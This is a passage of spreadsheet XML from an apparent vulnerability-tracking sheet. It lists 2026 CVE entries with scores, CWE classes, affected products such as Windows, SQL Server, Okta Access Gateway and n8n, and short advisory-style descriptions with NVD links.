t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79904</t></is></c></row><row r="1479"><c r="A1479" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1479" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1479" s="5" t="inlineStr"><is><t>CVE-2026-86735</t></is></c><c r="D1479" s="5" t="n"><v>5</v></c><c r="E1479" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1479" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1479" s="5" t="inlineStr" /><c r="H1479" s="5" t="n"><v>0.002</v></c><c r="I1479" s="5" t="inlineStr" /><c r="J1479" s="5" t="inlineStr" /><c r="K1479" s="5" t="inlineStr"><is><t>snipeitapp:snipe-it</t></is></c><c r="L1479" s="5" t="inlineStr" /><c r="M1479" s="5" t="inlineStr" /><c r="N1479" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1479" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1479" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1479" s="5" t="inlineStr" /><c r="R1479" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S1479" s="5" t="inlineStr"><is><t>snipe-it versions before 8.7.0 contain a server-side request forgery vulnerability in the ExternalUrl validation rule that fails to detect IPv6 transition addresses encoding private IPv4 targets. Attackers with super-admin privileges can configure webhook URLs using NAT64, 6to4, or Teredo transition addresses to bypass SSRF guards and access internal services or cloud metadata endpoints.</t></is></c><c r="T1479" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86735</t></is></c></row><row r="1480"><c r="A1480" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1480" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1480" s="5" t="inlineStr"><is><t>CVE-2026-22575</t></is></c><c r="D1480" s="5" t="n"><v>4.9</v></c><c r="E1480" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1480" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G1480" s="5" t="inlineStr" /><c r="H1480" s="5" t="n"><v>0.002</v></c><c r="I1480" s="5" t="inlineStr" /><c r="J1480" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K1480" s="5" t="inlineStr" /><c r="L1480" s="5" t="inlineStr" /><c r="M1480" s="5" t="inlineStr" /><c r="N1480" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1480" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1480" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1480" s="5" t="inlineStr" /><c r="R1480" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S1480" s="5" t="inlineStr"><is><t>An improper access control vulnerability in Fortinet FortiManager 7.6.0 through 7.6.4, FortiManager 7.4.0 through 7.4.10, FortiManager 7.2 all versions, FortiManager Cloud 7.6.2 through 7.6.4, FortiManager Cloud 7.4.1 through 7.4.10, FortiManager Cloud 7.2 all versions may allow an administrator to bypass the approval process for workflow sessions via crafted HTTP or HTTPs requests.</t></is></c><c r="T1480" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-22575</t></is></c></row><row r="1481"><c r="A1481" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1481" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1481" s="5" t="inlineStr"><is><t>CVE-2026-68785</t></is></c><c r="D1481" s="5" t="n"><v>4.9</v></c><c r="E1481" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1481" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1481" s="5" t="inlineStr" /><c r="H1481" s="5" t="n"><v>0.008</v></c><c r="I1481" s="5" t="inlineStr" /><c r="J1481" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1481" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1481" s="5" t="inlineStr" /><c r="M1481" s="5" t="inlineStr" /><c r="N1481" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1481" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1481" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1481" s="5" t="inlineStr" /><c r="R1481" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1481" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T1481" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68785</t></is></c></row><row r="1482"><c r="A1482" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1482" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1482" s="5" t="inlineStr"><is><t>CVE-2026-78624</t></is></c><c r="D1482" s="5" t="n"><v>4.9</v></c><c r="E1482" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1482" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1482" s="5" t="inlineStr" /><c r="H1482" s="5" t="n"><v>0.004</v></c><c r="I1482" s="5" t="inlineStr" /><c r="J1482" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1482" s="5" t="inlineStr" /><c r="L1482" s="5" t="inlineStr" /><c r="M1482" s="5" t="inlineStr" /><c r="N1482" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1482" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1482" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1482" s="5" t="inlineStr" /><c r="R1482" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S1482" s="5" t="inlineStr"><is><t>The Okta Access Gateway backup restore function does not validate the filename embedded in an encrypted backup payload. This results in writing file contents to unintended locations on the appliance filesystem.</t></is></c><c r="T1482" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78624</t></is></c></row><row r="1483"><c r="A1483" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1483" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1483" s="5" t="inlineStr"><is><t>CVE-2026-86085</t></is></c><c r="D1483" s="5" t="n"><v>4.9</v></c><c r="E1483" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1483" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1483" s="5" t="inlineStr" /><c r="H1483" s="5" t="n"><v>0.003</v></c><c r="I1483" s="5" t="inlineStr" /><c r="J1483" s="5" t="inlineStr" /><c r="K1483" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1483" s="5" t="inlineStr" /><c r="M1483" s="5" t="inlineStr" /><c r="N1483" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1483" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1483" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1483" s="5" t="inlineStr" /><c r="R1483" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1483" s="5" t="inlineStr"><is><t>n8n is an open source workflow automation platform. Prior to 2.37.7 and 2.38.2, the /rest/roles/:slug/assignments and /rest/roles/:slug/assignments/:projectId/members endpoints checked only whether the caller could manage the role type. A caller with role:manageProject could name a project the caller could not list and obtain member names and email addresses. The affected controller is packages/cli/src/controllers/role.controller.ts, which omitted the project:list scope check. This issue is fixed in versions 2.37.7 and 2.38.2.</t></is></c><c r="T1483" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86085</t></is></c></row><row r="1484"><c r="A1484" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1484" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1484" s="5" t="inlineStr"><is><t>CVE-2026-86993</t></is></c><c r="D1484" s="5" t="n"><v>4.9</v></c><c r="E1484" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1484" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1484" s="5" t="inlineStr" /><c r="H1484" s="5" t="n"><v>0.003</v></c><c r="I1484" s="5" t="inlineStr" /><c r="J1484" s="5" t="inlineStr" /><c r="K1484" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1484" s="5" t="inlineStr" /><c r="M1484" s="5" t="inlineStr" /><c r="N1484" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1484" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1484" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1484" s="5" t="inlineStr" /><c r="R1484" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1484" s="5" t="inlineStr"><is><t>n8n is an open source workflow automation platform. Prior to 1.123.76, 2.37.7, and 2.38.2, a Log Streaming event destination could reference a generic HTTP credential and decrypt whichever credential ID it named without an ownership check. A user with a custom global role carrying Log Streaming scopes could select a credential belonging to another project and send its decrypted secret to an attacker-controlled endpoint. The affected authorization boundary is packages/cli/src/modules/log-streaming.ee/destinations/destination-credentials-access.ts and the credential:read scope. This issue is fixed in versions 1.123.76, 2.37.7 and 2.38.2.</t></is></c><c r="T1484" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86993</t></is></c></row><row r="1485"><c r="A1485" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1485" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1485" s="5" t="inlineStr"><is><t>CVE-2026-69474</t></is></c><c r="D1485" s="5" t="n"><v>4.8</v></c><c r="E1485" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1485" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1485" s="5" t="inlineStr" /><c r="H1485" s="5" t="n"><v>0.007</v></c><c r="I1485" s="5" t="inlineStr" /><c r="J1485" s="5" t="inlineStr" /><c r="K1485" s="5" t="inlineStr" /><c r="L1485" s="5" t="inlineStr" /><c r="M1485" s="5" t="inlineStr" /><c r="N1485" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1485" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1485" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1485" s="5" t="inlineStr" /><c r="R1485" s="5" t="inlineStr"><is><t>CWE-126, CWE-416</t></is></c><c r="S1485" s="5" t="inlineStr"><is><t>Use after free in Windows Overlay Filter allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1485" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69474</t></is></c></row><row r="1486"><c r="A1486" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1486" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1486" s="5" t="inlineStr"><is><t>CVE-2026-69615</t></is></c><c r="D1486" s="5" t="n"><v>4.8</v></c><c r="E1486" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1486" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1486" s="5" t="inlineStr" /><c r="H1486" s="5" t="n"><v>0.004</v></c><c r="I1486" s="5" t="inlineStr" /><c r="J1486" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K1486" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L1486" s="5" t="inlineStr" /><c r="M1486" s="5" t="inlineStr" /><c r="N1486" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1486" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1486" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1486" s="5" t="inlineStr" /><c r="R1486" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1486" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t></is></c><c r="T1486" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69615</t></is></c></row><row r="1487"><c r="A1487" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1487" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1487" s="5" t="inlineStr"><is><t>CVE-2026-78560</t></is></c><c r="D1487" s="5" t="n"><v>4.8</v></c><c r="E1487" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1487" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1487" s="5" t="inlineStr" /><c r="H1487" s="5" t="n"><v>0.002</v></c><c r="I1487" s="5" t="inlineStr" /><c r="J1487" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1487" s="5" t="inlineStr" /><c r="L1487" s="5" t="inlineStr" /><c r="M1487" s="5" t="inlineStr" /><c r="N1487" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1487" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1487" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1487" s="5" t="inlineStr" /><c r="R1487" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S1487" s="5" t="inlineStr"><is><t>The Okta Access Gateway includes an optional pass-through authentication source that accepts user identity from a client-supplied HTTP header without cryptographic validation. In architectures where this optional source is enabled without an upstream reverse proxy or firewall configured to sanitize and enforce client headers, an unauthenticated user can supply an arbitrary identity value to initiate a session.</t></is></c><c r="T1487" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78560</t></is></c></row><row r="1488"><c r="A1488" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1488" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1488" s="5" t="inlineStr"><is><t>CVE-2026-68849</t></is></c><c r="D1488" s="5" t="n"><v>4.7</v></c><c r="E1488" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1488" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1488" s="5" t="inlineStr" /><c r="H1488" s="5" t="n"><v>0.002</v></c><c r="I1488" s="5" t="inlineStr" /><c r="J1488" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1488" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1488" s="5" t="inlineStr" /><c r="M1488" s="5" t="inlineStr" /><c r="N1488" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1488" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1488" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1488" s="5" t="inlineStr" /><c r="R1488" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1488" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Bluetooth Port Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="T1488" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68849</t></is></c></row><row r="1489"><c r="A1489" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1489" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1489" s="5" t="inlineStr"><is><t>CVE-2026-68891</t></is></c><c r="D1489" s="5" t="n"><v>4.7</v></c><c r="E1489" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1489" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1489" s="5" t="inlineStr" /><c r="H1489" s="5" t="n"><v>0.002</v></c><c r="I1489" s="5" t="inlineStr" /><c r="J1489" s="5" t="inlineStr" /><c r="K1489" s="5" t="inlineStr" /><c r="L1489" s="5" t="inlineStr" /><c r="M1489" s="5" t="inlineStr" /><c r="N1489" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1489" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1489" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1489" s="5" t="inlineStr" /><c r="R1489" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1489" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1489" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68891</t></is></c></row><row r="1490"><c r="A1490" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1490" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1490" s="5" t="inlineStr"><is><t>CVE-2026-69316</t></is></c><c r="D1490" s="5" t="n"><v>4.7</v></c><c r="E1490" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1490" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1490" s="5" t="inlineStr" /><c r="H1490" s="5" t="n"><v>0.003</v></c><c r="I1490" s="5" t="inlineStr" /><c r="J1490" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1490"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490" s="5" t="inlineStr" /><c r="M1490" s="5" t="inlineStr" /><c r="N1490" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1490" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1490" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1490" s="5" t="inlineStr" /><c r="R1490" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1490" s="5" t="inlineStr"><is><t>Buffer over-read in Windows Overlay Filter allows an authorized attacker to disclose information locally.</t></is></c><c r="T1490" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69316</t></is></c></row><row r="1491"><c r="A1491" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1491" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1491" s="5" t="inlineStr"><is><t>CVE-2026-69425</t></is></c><c r="D1491" s="5" t="n"><v>4.7</v></c><c r="E1491" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1491" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1491" s="5" t="inlineStr" /><c r="H1491" s="5" t="n"><v>0.003</v></c><c r="I1491" s="5" t="inlineStr" /><c r="J1491" s="5" t="inlineStr" /><c r="K1491" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L1491" s="5" t="inlineStr" /><c r="M1491" s="5" t="inlineStr" /><c r="N1491" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1491" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1491" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1491" s="5" t="inlineStr" /><c r="R1491" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="S1491" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows NTFS allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1491" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69425</t></is></c></row><row r="1492"><c r="A1492" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1492" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1492" s="5" t="inlineStr"><is><t>CVE-2026-69483</t></is></c><c r="D1492" s="5" t="n"><v>4.7</v></c><c r="E1492" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1492" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1492" s="5" t="inlineStr" /><c r="H1492" s="5" t="n"><v>0.003</v></c><c r="I1492" s="5" t="inlineStr" /><c r="J1492" s="5" t="inlineStr" /><c r="K1492" s="5" t="inlineStr" /><c r="L1492" s="5" t="inlineStr" /><c r="M1492" s="5" t="inlineStr" /><c r="N1492" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1492" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1492" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1492" s="5" t="inlineStr" /><c r="R1492" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1492" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Image Acquisition allows an authorized attacker to disclose information locally.</t></is></c><c r="T1492" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69483</t></is></c></row><row r="1493"><c r="A1493" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1493" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1493" s="5" t="inlineStr"><is><t>CVE-2026-69771</t></is></c><c r="D1493" s="5" t="n"><v>4.7</v></c><c r="E1493" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1493" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1493" s="5" t="inlineStr" /><c r="H1493" s="5" t="n"><v>0.003</v></c><c r="I1493" s="5" t="inlineStr" /><c r="J1493" s="5" t="inlineStr" /><c r="K1493" s="5" t="inlineStr" /><c r="L1493" s="5" t="inlineStr" /><c r="M1493" s="5" t="inlineStr" /><c r="N1493" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1493" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1493" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1493" s="5" t="inlineStr" /><c r="R1493" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="S1493" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows Container Manager Service allows an authorized attacker to bypass a security feature locally.</t></is></c><c r="T1493" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69771</t></is></c></row><row r="1494"><c r="A1494" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1494" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1494" s="5" t="inlineStr"><is><t>CVE-2026-69792</t></is></c><c r="D1494" s="5" t="n"><v>4.7</v></c><c r="E1494" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1494" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1494" s="5" t="inlineStr" /><c r="H1494" s="5" t="n"><v>0.002</v></c><c r="I1494" s="5" t="inlineStr" /><c r="J1494" s="5" t="inlineStr" /><c r="K1494" s="5" t="inlineStr" /><c r="L1494" s="5" t="inlineStr" /><c r="M1494" s="5" t="inlineStr" /><c r="N1494" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1494" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1494" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1494" s="5" t="inlineStr" /><c r="R1494" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S1494" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Win32K allows an authorized attacker to bypass a security feature locally.</t></is></c><c r="T1494" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69792</t></is></c></row><row r="1495"><c r="A1495" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1495" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1495" s="5" t="inlineStr"><is><t>CVE-2026-69832</t></is></c><c r="D1495" s="5" t="n"><v>4.7</v></c><c r="E1495" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1495" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1495" s="5" t="inlineStr" /><c r="H1495" s="5" t="n"><v>0.004</v></c><c r="I1495" s="5" t="inlineStr" /><c r="J1495" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K149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95" s="5" t="inlineStr" /><c r="M1495" s="5" t="inlineStr" /><c r="N1495" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1495" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1495" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1495" s="5" t="inlineStr" /><c r="R1495" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1495" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows Win32K allows an authorized attacker to disclose information locally.</t></is></c><c r="T1495" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69832</t></is></c></row><row r="1496"><c r="A1496" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1496" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1496" s="5" t="inlineStr"><is><t>CVE-2026-69853</t></is></c><c r="D1496" s="5" t="n"><v>4.7</v></c><c r="E1496" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1496" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1496" s="5" t="inlineStr" /><c r="H1496" s="5" t="n"><v>0.003</v></c><c r="I1496" s="5" t="inlineStr" /><c r="J1496" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1496"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96" s="5" t="inlineStr" /><c r="M1496" s="5" t="inlineStr" /><c r="N1496" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1496" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1496" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1496" s="5" t="inlineStr" /><c r="R1496" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1496" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows Win32K allows an authorized attacker to disclose information locally.</t></is></c><c r="T1496" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69853</t></is></c></row><row r="1497"><c r="A1497" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1497" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1497" s="5" t="inlineStr"><is><t>CVE-2026-69895</t></is></c><c r="D1497" s="5" t="n"><v>4.7</v></c><c r="E1497" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1497" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1497" s="5" t="inlineStr" /><c r="H1497" s="5" t="n"><v>0.003</v></c><c r="I1497" s="5" t="inlineStr" /><c r="J1497" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1497"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497" s="5" t="inlineStr" /><c r="M1497" s="5" t="inlineStr" /><c r="N1497" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1497" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1497" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1497" s="5" t="inlineStr" /><c r="R1497" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1497" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t></is></c><c r="T1497" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69895</t></is></c></row><row r="1498"><c r="A1498" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1498" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1498" s="5" t="inlineStr"><is><t>CVE-2026-72931</t></is></c><c r="D1498" s="5" t="n"><v>4.7</v></c><c r="E1498" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1498" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1498" s="5" t="inlineStr" /><c r="H1498" s="5" t="n"><v>0.003</v></c><c r="I1498" s="5" t="inlineStr" /><c r="J1498" s="5" t="inlineStr" /><c r="K1498" s="5" t="inlineStr" /><c r="L1498" s="5" t="inlineStr" /><c r="M1498" s="5" t="inlineStr" /><c r="N1498" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1498" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1498" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1498" s="5" t="inlineStr" /><c r="R1498" s="5" t="inlineStr"><is><t>CWE-772</t></is></c><c r="S1498" s="5" t="inlineStr"><is><t>Missing release of resource after effective lifetime in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to deny service locally.</t></is></c><c r="T1498" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72931</t></is></c></row><row r="1499"><c r="A1499" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1499" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1499" s="5" t="inlineStr"><is><t>CVE-2026-69381</t></is></c><c r="D1499" s="5" t="n"><v>4.6</v></c><c r="E1499" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1499" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1499" s="5" t="inlineStr" /><c r="H1499" s="5" t="n"><v>0.004</v></c><c r="I1499" s="5" t="inlineStr" /><c r="J1499" s="5" t="inlineStr" /><c r="K1499" s="5" t="inlineStr" /><c r="L1499" s="5" t="inlineStr" /><c r="M1499" s="5" t="inlineStr" /><c 